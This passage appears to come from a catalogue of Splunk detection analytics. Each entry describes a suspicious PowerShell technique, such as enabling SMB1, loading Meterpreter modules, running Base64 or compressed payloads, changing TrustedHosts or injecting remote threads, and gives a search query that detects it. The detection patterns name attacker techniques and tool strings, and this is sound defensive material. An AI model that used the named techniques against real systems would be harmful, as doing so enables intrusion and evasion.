| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_disable_security_monitoring_filter`
Powershell Enable SMB1Protocol Feature
The following analytic detects the enabling of the SMB1 protocol via `powershell.exe`. It leverages PowerShell script block logging (EventCode 4104) to identify the execution of the `Enable-WindowsOptionalFeature` cmdlet with the `SMB1Protocol` parameter. This activity is significant because enabling SMB1 can facilitate lateral movement and file encryption by ransomware, such as RedDot. If confirmed malicious, this action could allow an attacker to propagate through the network, encrypt files, and potentially disrupt business operations.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*Enable-WindowsOptionalFeature*" ScriptBlockText = "*SMB1Protocol*"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_enable_smb1protocol_feature_filter`Powershell Execute COM Object
The following analytic detects the execution of a COM CLSID through PowerShell. It leverages EventCode 4104 and searches for specific script block text indicating the creation of a COM object. This activity is significant as it is commonly used by adversaries and malware, such as the Conti ransomware, to execute commands, potentially for privilege escalation or bypassing User Account Control (UAC). If confirmed malicious, this technique could allow attackers to gain elevated privileges or persist within the environment, posing a significant security risk.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*CreateInstance([type]::GetTypeFromCLSID*"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_execute_com_object_filter`Powershell Fileless Process Injection via GetProcAddress
The following analytic detects the use of `GetProcAddress` in PowerShell script blocks, leveraging PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, which is then logged in Windows event logs. The presence of `GetProcAddress` is unusual for typical PowerShell scripts and often indicates malicious activity, as many attack toolkits use it to achieve code execution. If confirmed malicious, this activity could allow an attacker to execute arbitrary code, potentially leading to system compromise. Analysts should review parallel processes and the entire logged script block for further investigation.
Show query
`powershell` EventCode=4104 ScriptBlockText=*getprocaddress*
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_fileless_process_injection_via_getprocaddress_filter`Powershell Fileless Script Contains Base64 Encoded Content
The following analytic detects the execution of PowerShell scripts containing Base64 encoded content, specifically identifying the use of `FromBase64String`. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as Base64 encoding is often used by attackers to obfuscate malicious payloads, making it harder to detect. If confirmed malicious, this could lead to code execution, allowing attackers to run arbitrary commands and potentially compromise the system.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*frombase64string*" OR ScriptBlockText = "*gnirtS46esaBmorF*"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_fileless_script_contains_base64_encoded_content_filter`Powershell Get LocalGroup Discovery with Script Block Logging
The following analytic detects the execution of the PowerShell cmdlet `get-localgroup` using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, providing detailed visibility into script execution. Monitoring this activity is significant as it can indicate an attempt to enumerate local groups, which may be a precursor to privilege escalation or lateral movement. If confirmed malicious, an attacker could gain insights into group memberships, potentially leading to unauthorized access or privilege abuse. Review parallel processes and the entire script block for comprehensive analysis.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*get-localgroup*"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_get_localgroup_discovery_with_script_block_logging_filter`Powershell Load Module in Meterpreter
The following analytic detects the execution of suspicious PowerShell commands associated with Meterpreter modules, such as "MSF.Powershell" and "MSF.Powershell.Meterpreter". It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as it indicates potential post-exploitation actions, including credential dumping and persistence mechanisms. If confirmed malicious, an attacker could gain extensive control over the compromised system, escalate privileges, and maintain long-term access, posing a severe threat to the environment.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*MSF.Powershell*","*MSF.Powershell.Meterpreter*","*MSF.Powershell.Meterpreter.Kiwi*","*MSF.Powershell.Meterpreter.Transport*")
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_load_module_in_meterpreter_filter`Powershell Processing Stream Of Data
The following analytic detects suspicious PowerShell script execution involving compressed stream data processing, identified via EventCode 4104. It leverages PowerShell Script Block Logging to flag scripts using `IO.Compression`, `IO.StreamReader`, or decompression methods. This activity is significant as it often indicates obfuscated PowerShell or embedded .NET/binary execution, which are common tactics for evading detection. If confirmed malicious, this behavior could allow attackers to execute hidden code, escalate privileges, or maintain persistence within the environment.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*IO.Compression.*" OR ScriptBlockText = "*IO.StreamReader*" OR ScriptBlockText = "*]::Decompress*"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_processing_stream_of_data_filter`Powershell Remote Services Add TrustedHost
The following analytic detects the execution of a PowerShell script that modifies the 'TrustedHosts' configuration via EventCode 4104. It leverages PowerShell Script Block Logging to identify commands targeting WSMan settings, specifically those altering or concatenating trusted hosts. This activity is significant as it can indicate attempts to manipulate remote connection settings, potentially allowing unauthorized remote access. If confirmed malicious, this could enable attackers to establish persistent remote connections, bypass security protocols, and gain unauthorized access to sensitive systems and data.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*WSMan:\\localhost\\Client\\TrustedHosts*" ScriptBlockText IN ("* -Value *", "* -Concatenate *") | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id user_id vendor_product EventID Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remote_services_add_trustedhost_filter`Powershell Remote Thread To Known Windows Process
The following analytic detects suspicious PowerShell processes attempting to inject code into critical Windows processes using CreateRemoteThread. It leverages Sysmon EventCode 8 to identify instances where PowerShell spawns threads in processes like svchost.exe, csrss.exe, and others. This activity is significant as it is commonly used by malware such as TrickBot and offensive tools like Cobalt Strike to execute malicious payloads, establish reverse shells, or download additional malware. If confirmed malicious, this behavior could lead to unauthorized code execution, privilege escalation, and persistent access within the environment.
Show query
`sysmon` EventCode = 8 parent_process_name IN ("powershell_ise.exe", "powershell.exe") TargetImage IN ("*\\svchost.exe","*\\csrss.exe" "*\\gpupdate.exe", "*\\explorer.exe","*\\services.exe","*\\winlogon.exe","*\\smss.exe","*\\wininit.exe","*\\userinit.exe","*\\spoolsv.exe","*\\taskhost.exe") | stats count min(_time) as firstTime max(_time) as lastTime by EventID Guid NewThreadId ProcessID SecurityID SourceImage SourceProcessGuid SourceProcessId StartAddress StartFunction StartModule TargetImage TargetProcessGuid TargetProcessId UserID dest parent_process_exec parent_process_guid parent_process_id parent_process_name parent_process_path process_exec process_guid process_id process_name process_path signature signature_id user_id vendor_product | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remote_thread_to_known_windows_process_filter`Showing 1051-1100 of 2,101